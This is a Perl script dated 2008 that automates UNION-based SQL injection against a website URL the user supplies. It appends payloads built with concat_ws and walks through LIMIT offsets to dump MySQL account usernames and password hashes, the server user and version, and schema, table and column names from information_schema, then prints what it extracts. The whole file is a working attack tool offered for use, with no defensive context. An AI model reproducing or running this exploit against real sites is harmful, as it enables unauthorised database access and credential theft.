#!/usr/bin/perl
# sm4x - 2008 
# 1nf0rm3r.pl
# quick perl script to extract db information via website sql injections
#  v1.1 - 2008-08-20 
# perl informer.pl <from> <to> (for limits)

use LWP::UserAgent;
use HTTP::Request;
#use Crypt::SSLeay;

@sqldata = ();
@warns = ();
@urlhits = ();

# account info (must be wrapped in $$<data>:$ or NO DATA IS DISPAYED!!)
#@account_vectors = (
#'concat_ws(0x24,0x24,concat_ws(0x3a,user,password,0x24))',
#);

# add ur own customs for more dumps
@account_vectors = (
'concat_ws(0x24,0x24,concat_ws(0x3a,userid,password,0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,user(),version(),user(),0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,table_schema,table_name,table_type,0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,table_name,column_name,0x24))'
);

# account database info - custom
#@account_dbnames = (
#'mysql.user'
#);

@account_dbnames = (
'mysql.user',
'user',
'information_schema.tables',
'information_schema.columns'
);

#comments - custom
#@comments = (
#'--'
#);
@comments = (
'',
'--',
'/*'
);

# perl informer.pl <from> <to>
$offset = 0;
$sqldata = 0;
undef %dups;

$from_limit = scalar($ARGV[0]);
$to_limit = scalar($ARGV[1]);

system("clear");
print q{ 
[+] ---------------------------------------------------------------------
[+]                           .:: 1nf0rm4nt ::.
[+] ---------------------------------------------------------------------
};
							  
printf("[+] Usage: perl informer.pl <from limit> <to limit>\n");
printf("[+] Target: http://target.com/index.php?<start link>,<injection_point>,<end link>\n");

if($from_limit > -1 && $to_limit > 0) {
	printf("[+] Limit $from_limit to $to_limit\n");
}

# grab the md5 
printf("[+] Site start link: ");
chomp($start_link = <STDIN>);
#$start_link = 'http://127.0.0.1/index2.php?&id=1+union+select+';

if($start_link !~ /http:\/\//) { $start_link = "http://" . $start_link; }

printf("[+] Site ending link: ");
chomp($end_link = <STDIN>);
#$end_link = ',2';

printf("[+] Targeting: $start_link$end_link\n");
printf("[+]--------------------------------\n");
printf("[+] .:: Scanning ... ::.\n");
foreach $v1(@account_vectors) {
	$link = $start_link.$v1.$end_link;
	
	# attach db with from <DBNAME>
	foreach $db(@account_dbnames) {
		if(length($db) > 0) { $link2 = $link.'+from+'.$db; } else { $link2 = $link; }
		# limits?
		if($from_limit != $to_limit && $to_limit>0) {
			for($i = scalar($from_limit); $i < scalar($to_limit); $i++) {
				$pwnd_link_limit = $link2 ."+limit+".$i.",1";
			
				foreach $comment(@comments) {
					$pwnd_link_limit_comments = $pwnd_link_limit.$comment;
					$is_printed = 0;
					#printf("LINK: $pwnd_link_limit_comments\n");
					$request = HTTP::Request->new(GET=>$pwnd_link_limit_comments); 
					$useragent = LWP::UserAgent->new();
		
					# check response
					$response = $useragent->request($request);
					if($response->is_success && $response->content =~ /\$\$/) { 
						
						my @vars = split(/\$\$/, $response->content);
						foreach $item(@vars) {
							if($item =~ /:\$/) {
								#printf("INDEX: $item, $result\n");
								#$c = index($item, ':$', 0);
								$data = substr($item, 0, index($item, ':$', 0));
								if(!$dups{$data}) { 
									push(@sqldata, $data); $dups{$data} = 1; 
									if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; }
									$sqldata++; 
								}
								#printf(".");
								printf("[+] $data\n"); 
							
							}
						}
					} 
				}
			}
		} else {
			# attach comment and try
			foreach $comment(@comments) {
				$pwnd_link = $link2.$comment;
				#printf("[+] Checking: $pwnd_link\n";
				$is_printed = 0;
				$request = HTTP::Request->new(GET=>$pwnd_link); 
				$useragent = LWP::UserAgent->new();
	
				# check response
				$response = $useragent->request($request);
				if($response->is_success && $response->content =~ /\$\$/) { 
					
					my @vars = split(/\$\$/, $response->content);
					foreach $item(@vars) {
						if($item =~ /:\$/) {
							#printf("INDEX: $item, $result\n");
							#$c = index($item, ':$', 0);
							$data = substr($item, 0, index($item, ':$', 0));
							if(!$dups{$data}) { 
								push(@sqldata, $data); $dups{$data} = 1; 
								if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; }
								$sqldata++; 
							}
							#printf(".");
							printf("[+] $data\n"); 
						}
					}
				} 
			}
			# printf(our injection
			if(!$is_printed) {
				unshift(@sqlinjections, $pwned_link);
				#printf("----------------------------------------------------------\n[+] w00t:\n $pwnd_link\n----------------------------------------------------------\n");
				$is_printed = 1;
			}
		}
	}
}

# print found data (no dups)
print q{ 
[+] ---------------------------------------------------------------------
[+]                           .:: r3p0rt ::.
[+] ---------------------------------------------------------------------
};

#print returned results
foreach $item(@sqldata) {
	printf("[+] $item\n");
}

# uncomment for sql query 
#printf("[+] ---------------------------------------------------------------------\n");
foreach $item(@urlhits) {
	printf("[+] $item\n");
}

printf("[+] ---------------------------------------------------------------------\n");
printf("[+] Total: $sqldata\n");
printf("\n[+] Done\n");

# done